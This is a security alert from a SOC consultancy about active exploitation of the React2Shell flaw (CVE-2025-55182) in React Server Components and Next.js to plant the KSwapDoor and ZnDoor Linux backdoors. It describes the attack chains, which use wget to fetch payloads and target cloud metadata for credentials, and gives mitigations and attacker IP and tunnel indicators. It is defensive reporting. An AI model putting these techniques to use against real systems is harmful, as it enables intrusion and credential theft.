Perceptive Security
SOC/SIEM Consultancy
React2Shell Vulnerability Actively Exploited to Deploy Linux Backdoors
Published:
16 december 2025 om 08:21:00
Alert date:
16 december 2025 om 09:01:26
Source:
thehackernews.com
Web Technologies, Zero-Day Vulnerabilities, Ransomware & Malware, Data Breach & Exfiltration
The React2Shell vulnerability is being actively exploited by threat actors to deploy malware families including KSwapDoor and ZnDoor on Linux systems. KSwapDoor is described as a professionally engineered remote access tool designed with stealth capabilities. The exploitation campaign has been documented by security researchers from Palo Alto Networks Unit 42 and NTT Security, indicating ongoing active threats targeting Linux environments through this vulnerability.
Technical details
React2Shell vulnerability (CVE-2025-55182) is being exploited to deploy Linux backdoors including KSwapDoor and ZnDoor. KSwapDoor builds internal mesh networks for compromised server communication, uses military-grade encryption, features a sleeper mode for firewall bypass, and impersonates legitimate Linux kernel swap daemon. ZnDoor has been active since December 2023 and supports commands for shell execution, file operations, system information gathering, SOCKS5 proxy, and port forwarding. Attack chains involve running bash commands to fetch payloads from remote servers using wget. Multiple China-nexus threat groups have weaponized the vulnerability to deliver various payloads. Attacks use Cloudflare Tunnel endpoints for evasion and target cloud metadata services for credential harvesting.
Mitigation steps:
Organizations should patch CVE-2025-55182 immediately, monitor for suspicious bash commands fetching payloads via wget, watch for Cloudflare Tunnel endpoint usage, implement monitoring for unauthorized access to cloud metadata services, check for unauthorized SSH key modifications and root login enablement, scan for presence of RMM tools like MeshAgent, monitor for credential harvesting tools like TruffleHog and Gitleaks, and verify system integrity to detect Linux kernel swap daemon impersonation.
Affected products:
React Server Components
Next.js
Linux systems
Related links:
https://thehackernews.com/2025/12/react2shell-exploitation-delivers.html
https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/
https://jp.security.ntt/insights_resources/tech_blog/react2shell_malware_zndoor/
https://www.praetorian.com/blog/critical-advisory-remote-code-execution-in-next-js-cve-2025-66478-with-working-exploit/
https://thehackernews.com/2025/12/react2shell-exploitation-escalates-into.html
https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/
https://beelzebub.ai/blog/threat-huntinga-analysis-of-a-nextjs-exploit-campaign/
https://thehackernews.com/2025/03/critical-nextjs-vulnerability-allows.html
https://thehackernews.com/2025/12/critical-rsc-bugs-in-react-and-nextjs.html
https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=7&source=http_vulnerable&source=http_vulnerable6&tag=cve-2025-55182%2B&dataset=unique_ips&limit=100&group_by=geo&stacking=stacked&auto_update=on
https://dashboard.shadowserver.org/statistics/combined/tree/?date_range=1&source=http_vulnerable&source=http_vulnerable6&tag=cve-2025-55182%2B&data_set=count&scale=log&auto_update=on
https://viz.greynoise.io/query/tags:%22React%20Server%20Components%20Unsafe%20Deserialization%20CVE-2025-55182%20RCE%20Attempt%22%20last_seen:1d
Related CVE's:
Related threat actors:
IOC's:
45.76.155[.]14, 67.217.57[.]240:888, *.trycloudflare.com
This article was created with the assistance of AI technology by Perceptive.